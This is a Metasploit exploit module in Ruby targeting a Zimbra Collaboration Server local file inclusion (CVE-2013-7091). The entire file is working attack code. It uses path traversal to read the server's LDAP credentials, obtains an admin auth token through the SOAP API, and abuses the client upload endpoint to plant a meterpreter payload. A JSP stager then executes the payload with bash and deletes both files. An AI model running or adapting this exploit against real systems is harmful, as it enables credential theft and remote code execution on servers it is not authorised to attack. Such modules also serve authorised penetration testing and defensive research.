##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rexml/document'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include REXML

  Rank = GreatRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Zimbra Collaboration Server LFI',
      'Description'     => %q{
      A Local file inclusion exists in versions 8.0.2, 7.2.2 and possibly other versions which allows an attacker to get the LDAP
      credentials from the localconfig.xml file. The stolen credentials enables the attacker to make requests to the service/admin/soap API. This can then be used
      to create an authentication token for the admin web interface where an administrative user can be added or code execution could be leveraged.
      Tested on Zimbra Collaboration Server 8.0.2 with Ubuntu Server 12.04.
      },
      'Author'          =>
        [
          'rubina119', # Vulnerability discovery
          'Mekanismen <mattias[at]gotroot.eu>' # Metasploit module
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          [ "CVE", "2013-7091" ],
          [ "EDB", "30085" ],
          [ 'URL', "http://cxsecurity.com/issue/WLB-2013120097" ]
        ],
      'Privileged'      => false,
      'Platform'        => ['linux'],
      'Targets'         =>
        [
         [ 'Linux',
            {
            'Arch'      => ARCH_X86,
            'Platform'  => 'linux'
            }
          ],
        ],
      'DefaultOptions'  =>
        {
          'SSL'         => true
        },
      'DefaultTarget'   => 0,
      'DisclosureDate'  => "Dec 06 2013"
    ))
    register_options(
      [
        OptPort.new('RPORT', [true, 'The target port', 7071])
      ])

    register_advanced_options(
      [
        OptString.new('ALTDIR', [ false, 'Alternative zimbraAdmin directory', "zimbraAdmin"])
      ])
  end

  def check
    uri = target_uri.path

    res = send_request_cgi({
      'uri' => normalize_uri(uri, datastore['ALTDIR'], "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz"),
      'method' => 'GET',
      'encode_params' => false,
      'vars_get' => {
        'v' => "091214175450",
        'skin' => "../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
      }
    })

    unless res and res.code == 200
      return Exploit::CheckCode::Safe
    end

    #this response is ~100% gzipped
    begin
      text =  Rex::Text.ungzip(res.body)
    rescue Zlib::GzipFile::Error
      text = res.body
    end

    if text =~ /name=\\"zimbra_user\\">";\sa\["<value>(.*)<\/value>/
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    uri = target_uri.path

    res = send_request_cgi({
      'uri' => normalize_uri(uri, datastore['ALTDIR'], "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz"),
      'method' => 'GET',
      'encode_params' => false,
      'vars_get' => {
        'v' => "091214175450",
        'skin' => "../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
      }
    })

    unless res and res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
    end

    print_status("#{peer} - Getting login credentials...")
    #this response is ~100% gzipped
    begin
      text =  Rex::Text.ungzip(res.body)
    rescue Zlib::GzipFile::Error
      text = res.body
    end

    if text =~ /name=\\"zimbra_user\\">";\sa\["<value>(.*)<\/value>/
      zimbra_user = $1
    else
      fail_with(Failure::Unknown, "#{peer} - Unable to get login credentials")
    end

    if text =~ /name=\\"zimbra_ldap_password\\">";\sa\["<value>(.*)<\/value>/
      zimbra_pass = $1
    else
      fail_with(Failure::Unknown, "#{peer} - Unable to get login credentials")
    end

    print_good("#{peer} - Got login credentials!")
    print_status("#{peer} - Getting auth token...")

    soap_req = build_soap_req(zimbra_user, zimbra_pass) #lets get our hands foamy

    res = send_request_cgi({
      'uri'             => normalize_uri(uri, "/service/admin/soap"),
      'method'          => 'POST',
      'ctype'           => 'application/soap+xml; charset="utf-8"',
      'headers'         =>
        {
          'SOAPAction'  => '"urn:zimbraAdmin#AuthRequest"',
        },
      'data'            => soap_req
    })

    unless res and res.code == 200
      print_status res.body
      fail_with(Failure::Unknown, "#{peer} - Unable to access service URL")
    end

    if res.body =~ /<authToken>(.*)<\/authToken>/
      auth_token = $1
    else
      fail_with(Failure::Unknown, "#{peer} - Unable to get auth token")
    end

    cookie =  "ZM_ADMIN_AUTH_TOKEN=#{auth_token}"
    print_good("#{peer} - Got auth token!")

    #the initial POC for this vuln shows user creation with admin rights for the web interface, thats cool but a shell is even cooler
    #the web interface has a function to upload the latest version of the desktop client via /service/extension/clientUploader/upload/
    #the intent is for a ZCO file, whatever that is. However any file will do and it's placed in /downloads/ which we can reach, how handy!

    #push our meterpreter and then a stager jsp file that sets correct permissions, executes the meterpreter and removes itself afterwards
    payload_name = rand_text_alpha(8+rand(8))
    stager_name = rand_text_alpha(8+rand(8)) + ".jsp"
    req_id = rand_text_numeric(2).to_s

    stager = gen_stager(payload_name)
    dpayload = generate_payload_exe

    #upload payload
    print_status("#{peer} - Uploading .JSP stager and payload")
    post_data = Rex::MIME::Message.new
    post_data.add_part("#{payload_name}", nil, nil, "form-data; name=\"filename1\"")
    post_data.add_part("#{dpayload}", "application/octet-stream", nil, "form-data; name=\"clientFile\"; filename=\"#{payload_name}\"")
    post_data.add_part("#{req_id}", nil, nil, "form-data; name=\"requestId\"")

    n_data = post_data.to_s
    n_data = n_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    res = send_request_cgi({
      'uri'             => normalize_uri(uri, "/service/extension/clientUploader/upload/"),
      'method'          => 'POST',
      'ctype'           => 'multipart/form-data; boundary=' + post_data.bound,
      'data'            => n_data,
      'cookie'          => cookie
    })

    unless res and res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Unable to get upload payload")
    end

    #upload jsp stager
    post_data = Rex::MIME::Message.new
    post_data.add_part("#{stager_name}", nil, nil, "form-data; name=\"filename1\"")
    post_data.add_part("#{stager}", "application/octet-stream", nil, "form-data; name=\"clientFile\"; filename=\"#{stager_name}\"")
    post_data.add_part("#{req_id}", nil, nil, "form-data; name=\"requestId\"")

    n_data = post_data.to_s
    n_data = n_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    res = send_request_cgi({
      'uri'             => normalize_uri(uri, "/service/extension/clientUploader/upload/"),
      'method'          => 'POST',
      'ctype'           => 'multipart/form-data; boundary=' + post_data.bound,
      'data'            => n_data,
      'cookie'          => cookie
    })

    unless res and res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Unable to upload stager")
    end

    print_good("#{peer} - Stager and payload uploaded!")
    print_status("#{peer} - Stager at #{peer}/downloads/#{stager_name}")
    print_status("#{peer} - Executing payload!")

    res = send_request_cgi({
      'uri'             => normalize_uri(uri, "downloads", stager_name),
      'method'          => 'GET',
    })
  end

  def build_soap_req(zimbra_user, zimbra_pass)
    xml = Document.new
    soap_var = "ns1:AuthRequest"

    xml.add_element(
      "soapenv:Envelope",
      {
        'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
        'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
        'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
        'xmlns:ser'     => "http://service.emulation.ws.mercury.com",
        'xmlns:env'     => "http://www.w3.org/2003/05/soap-envelope",
        'xmlns:ns1'     => "urn:zimbraAdmin",
        'xmlns:ns2'     => "urn:zimbraAdmin",
     })

    xml.root.add_element("soapenv:Header")
    xml.root.add_element("soapenv:Body")

    header = xml.root.elements[1]
    body = xml.root.elements[2]

    header.add_element("ns2:context")
    body.add_element("ns1:AuthRequest")

    ns1 =  body.elements[1]
    ns1.add_element(
      "account",
      {
        'by' => "name"
      })

    ns1.add_element("password")

    ns1.elements["account"].text  = "#{zimbra_user}"
    ns1.elements["password"].text = "#{zimbra_pass}"

    return xml.to_s
  end

  def gen_stager(payload_name)
    stager  = "<%@ page import=\"java.util.*,java.io.*\"%>"
    stager += " <%"
    stager += " String uri = request.getRequestURI();"
    stager += " String filename = uri.substring(uri.lastIndexOf(\"/\")+1);"
    stager += " String jspfile = new java.io.File(application.getRealPath(request.getRequestURI())).getParent() + \"/\" + filename;"
    stager += " String payload = new java.io.File(application.getRealPath(request.getRequestURI())).getParent() + \"/#{payload_name}\";"
    stager += " Runtime.getRuntime().exec(\"chmod 700 \" + payload);"
    stager += " Runtime.getRuntime().exec(\"bash -c '\" + payload + \"'\");"
    stager += " Runtime.getRuntime().exec(\"rm \" + jspfile);"
    stager += " Runtime.getRuntime().exec(\"rm \" + payload);"
    stager += "%>"
    return stager
  end
end